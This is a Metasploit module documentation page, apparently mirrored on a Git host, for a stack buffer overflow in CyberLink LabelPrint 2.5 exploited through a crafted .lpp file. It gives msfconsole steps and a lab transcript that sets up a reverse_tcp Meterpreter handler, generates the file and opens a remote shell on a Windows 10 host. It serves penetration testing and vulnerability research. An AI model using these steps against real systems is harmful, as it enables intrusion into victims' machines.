adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
6d9d9a70d410cc94de4d3d9afd7a75cd426d43be
metasploit-gs/documentation/modules/exploit/windows/fileformat/cyberlink_lpp_bof.md
T
cgranleese-r7 adff497bd2 Updates msf5 as well
2025-07-17 11:51:29 +01:00

2.5 KiB
Raw Blame History

Description

This module exploits a stack buffer overflow in CyberLink LabelPrint 2.5 and below. The vulnerability is triggered when opening a .lpp project file containing overly long string characters via open file menu. This results in overwriting a structured exception handler record and take over the application. This module has been tested on Windows 7 (64 bit), Windows 8.1 (64 bit), and Windows 10 (64 bit).

Vulnerable Application

CyberLink LabelPrint v2.5, which is available with Power2Go 12 Essential

Verification Steps

  1. ./msfconsole
  2. use exploit/multi/handler
  3. set payload windows/meterpreter/reverse_tcp
  4. set lhost <lhost>
  5. set exitonsession false
  6. exploit -j
  7. use windows/fileformat/cyberlink_lpp_bof
  8. set lhost <lhost>
  9. set target 2
  10. exploit
  11. Copy file to Win10 host and open in vulnerable software
  12. Get a shell

Scenarios

Tested Windows 10 x64 running CyberLink LabelPrint v2.5

msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 172.22.222.132 
lhost => 172.22.222.132
msf exploit(multi/handler) > set exitonsession false
exitonsession => false
msf exploit(multi/handler) > exploit -j
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
msf exploit(multi/handler) >
[*] Started reverse TCP handler on 172.22.222.132:4444
use windows/fileformat/cyberlink_lpp_bof
msf exploit(windows/fileformat/cyberlink_lpp_bof) > set lhost 172.22.222.132 
lhost => 172.22.222.132
msf exploit(windows/fileformat/cyberlink_lpp_bof) > set target 2
target => 2
msf exploit(windows/fileformat/cyberlink_lpp_bof) > exploit

[*] Creating 'msf.lpp' file ...
[+] msf.lpp stored at /home/msfdev/.msf4/local/msf.lpp
msf exploit(windows/fileformat/cyberlink_lpp_bof) >
[*] Sending stage (179779 bytes) to 172.22.222.200
[*] Meterpreter session 1 opened (172.22.222.132:4444 -> 172.22.222.200:50522) at 2018-12-11 06:24:38 -0600
sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : DESKTOP-IPOGIJR
OS              : Windows 10 (Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.22.222.200 - Meterpreter session 1 closed.  Reason: User exit
Reference in New Issue View Git Blame Copy Permalink